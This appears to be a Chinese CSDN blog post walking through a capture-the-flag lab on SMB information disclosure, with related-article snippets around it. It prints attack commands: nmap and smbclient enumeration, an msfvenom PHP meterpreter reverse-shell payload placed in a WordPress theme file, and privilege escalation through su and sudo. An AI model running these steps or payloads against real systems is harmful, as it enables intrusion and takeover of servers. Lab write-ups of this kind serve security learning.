CTF-SMB信息泄露【简单易懂】

最新推荐文章于 2024-04-26 09:06:25 发布
最新推荐文章于 2024-04-26 09:06:25 发布
阅读量587 收藏 9
点赞数 20
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53058639/article/details/135987387
版权

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

CTF-
专栏:https://blog.csdn.net/m0_63127854/category_11835386.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

SMB介绍

实验环境

信息探测

分析探测结果

针对SMB协议弱点分析

1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

2.针对SMB协议远程溢出漏洞进行分析

针对http协议弱点分析

1.浏览器查看网站

2.使用dirb nikto探测

3.寻找突破点,目标登录后台,上传webshell

4.优化终端

5.查找用户名:cat /etc/passwd

6.查找密码:在共享目录下的敏感文件,提升权限

SMB介绍

SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

SMB协议,计算机可以访问网络资源,下载对应的资源文件

实验环境

kali 192.168.20.128

靶机 192.168.20.129

链接:https://pan.baidu.com/s/1inGR9A628icBnqcsHCnPYQ
提取码:4c5l

信息探测

nmap -sV ip 挖掘开放服务信息

nmap -A -v -T4 挖掘靶场全部信息

nmap -sV 192.168.20.129

分析探测结果

每一个服务对应计算机的一个端口,用来进行通信。常用端口0-1023端口,在扫描结果中查找特殊端口

针对特殊端口进行探测,尤其对开发大端口的http服务进行排查

针对SMB协议弱点分析

1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

smbclient -L ip

smbclient ‘\\ip\share$’

print 和 I P C 和IPC IPC没有什么利用价值

get 敏感文件

发现疑似数据库密码的数据(Admin;togieMYSQL12345^^)

远程登录3306端口不行

远程登录22端口不行

2.针对SMB协议远程溢出漏洞进行分析

searchsploit samba版本号

发现没有远程溢出漏洞

针对http协议弱点分析

1.浏览器查看网站
2.使用dirb nikto探测

打开查看

利用密码登录

登陆网站

3.寻找突破点,目标登录后台,上传webshell

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f raw

制作webshell.php

启动监听

上传webshell

update file

获取反弹shell

选择twentyfifteen的原因

http://192.168.20.129/wordpress/wp-content/themes/twentyfifteen/404.php

4.优化终端

python -c “import pty;pty.spawn(‘/bin/bash’)”

5.查找用户名:cat /etc/passwd

6.查找密码:在共享目录下的敏感文件,提升权限

su 用户名

12345是之前deets.txt文件里的密码

sudo-l

sudo su

查看flag.txt(根目录下没找到flag.txt,所以查看proof.txt)

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

程序员小肖
关注
  • 20
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一、CTF-Web-信息泄露(记录CTF学习)
qq_27920699的博客
12-16 2719
个人CTF学习之路
CTF学习(二)——信息泄露、密码口令、SQL注入、文件上传
学习记录
02-28 1177
一、信息泄露 1.1目录遍历 ①点开题目后依次点开各目录,遍历后发现flag文件得旗 1.2 PHPINFO ①在长篇文件中查找flag得旗 1.3备份文件下载 1.3.1 网站源码 ①由提示下载文件www.zip后得到一份flag文件 ②flag文件中无flag,访问该文件名得旗 1.3.2 bak文件 ①访问index.php.bak,通过HBuilder X打开文件得旗 1.3.3 vim缓存 ①访问.index.php.swp(注意.),保存文件 ②通过HBuilder X打开文
CTFHUB-WEB-信息泄露
weixin_43486981的博客
08-13 988
CTFHUB-WEB-信息泄露目录遍历:PHPINFO备份文件下载备份文件下载-网站源码Dirsearch目录爆破工具备份文件下载-bak文件备份文件下载-vim缓存备份文件下载-.DS_StoreSVN泄露工具:dvcs-ripper信息泄露利用工具Git泄露Git泄露-LogHithack:.git泄露利用工具,可还原历史版本Git泄露-stashGit泄露-index 目录遍历: 靶机环境 点进去是4个文件夹,开始寻找flag 发现flag在2/3文件夹里,打开即可获得flag 别人博客里的代
CTF信息泄露.(CTFHub靶场环境)
网络安全领域___专研者.
07-31 3199
信息泄露 ” 是指网站无意间向用户泄露敏感信息泄露了有关于其他用户的数据,例如:另一个用户名的财务信息,敏感的商业 或 商业数据 ,还有一些有关网站及其基础架构的技术细节 等泄露信息泄露敏感的用户或业务数据的危险相当明显,但是泄露技术信息有时可能同样严重,尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他的漏洞。
CTFHub Web 信息泄漏(一)
最新发布
2301_81105268的博客
04-26 1107
打开题目点击开始寻找flag发现在flag_in_here页面中有四个文件夹点击打开第一个文件夹发现里面还有四个文件夹再次点击打开第一个文件夹里面什么都没有尝试对所有文件夹依次都点击打开在2/4中发现flag.txt点击打开即可得到flag不太懂这题的难点,搜索了一下目录遍历的知识点。目录遍历攻击,旨在访问存储在Web根文件夹之外的文件和目录。
CTFhub信息泄露漏洞实验指导手册
weixin_43401651的博客
09-30 571
环境:Windows2008、Kali Linux靶场:CTFhub-信息泄露工具:浏览器:火狐浏览器抓包改包工具:burpsuite信息泄露漏洞利用工具:dirsearch、GitHack、dvcs-ripper、Nmap。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
ctf-all-in-one
01-30
ctf-all-in-one
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
CTF信息泄漏.pdf
02-11
CTF信息泄漏
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTFHUB 信息泄露
wwwwyyyrre的博客
04-15 292
打开题目点击寻找flag有4个目录 既然是目录遍历 就先一个一个找找看在这里找到了flag.txt 得到flag。
常见Web源码泄露总结
weixin_50464560的博客
03-20 864
本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现。 一、源码泄漏分类 0x00 .hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http://www.example.com/.hg/ 漏洞利用: 工具:dvcs-ripper rip-hg.pl -v -u http://www.example.com...
CTF信息泄漏
weixin_56947109的博客
04-22 782
文章目录一、目录遍历1.打开题目2.进入环境3.解题步骤二、PHPINFO1.打开题目2.进入环境3.解题步骤 一、目录遍历 1.打开题目 2.进入环境 通过题目开启后,打开题目附件 3.解题步骤 ①打开网站,提示点击寻找flag ②跳转到flag_in_here这个目录,挨个对里面的目录进行寻找。 ③因为flag每次出现的位置都随机,多找找就可以发现 ④最终可以在某个目录中找到flag 二、PHPINFO 1.打开题目 2.进入环境 通过题目开启后,打开题目附件 通过下方链接进入环境 http
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 766
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTF中的GIT泄露
zy_mpy的博客
03-13 898
由于本人也是一名ctf的萌新,所以笔记比较易懂但又不可避免的浅显,如有错误,欢迎各路大神来指正。先简单介绍一下Git,Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git目录,用来记录代码的变更记录等。发布代码的时候,如果没有把,git这个目录删除,就直接发布到了服务器上,攻击者就可以通过它来恢复源代码,这就引起了git泄露漏洞。处理Git泄露的题目时,需要用到scrabble,dirsearch和gihack三个工具。一、常规git泄露常规 gi
CTFHub:信息泄露
2301_80911344的博客
04-04 723
信息泄露(Information Disclosure),在计算机安全领域中,是指由于系统或应用程序中的漏洞或错误配置,导致未经授权的用户可以访问或检索到敏感信息的情况。这些敏感信息可能包括但不限于个人身份信息、密码、加密密钥、配置文件、源代码、数据库内容以及任何不应公开的公司内部数据。程序员在软件中不慎留下的调试代码或错误信息,这可能向外界公开了系统内部的运行情况。网站或应用程序没有正确地验证用户的访问权限,从而允许未授权用户读取或下载原本应该限制访问的数据。
CTF中的信息泄露
meteox的博客
08-04 2240
服务器之前没咋用,后面的时间应该也没啥时间用了,就没续费了,GitHub page 直接上传图片访问速度又很慢,主题出bug也懒得折腾了,想来还是直接在csdn上写方便很多,也不用重新找图床啥的,之前有很多没写完的笔记,现在有时间也慢慢整理总结下。 一般先用dirmap扫一下,看下有没有信息泄露CTF中不太建议用御剑的那些字典,很多没用的不必要扫 python3 dirmap.py -i https://target.com -lcf 网站备份文件 在网站的使用过程中,往往需要对网站中的文件进行修改、
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值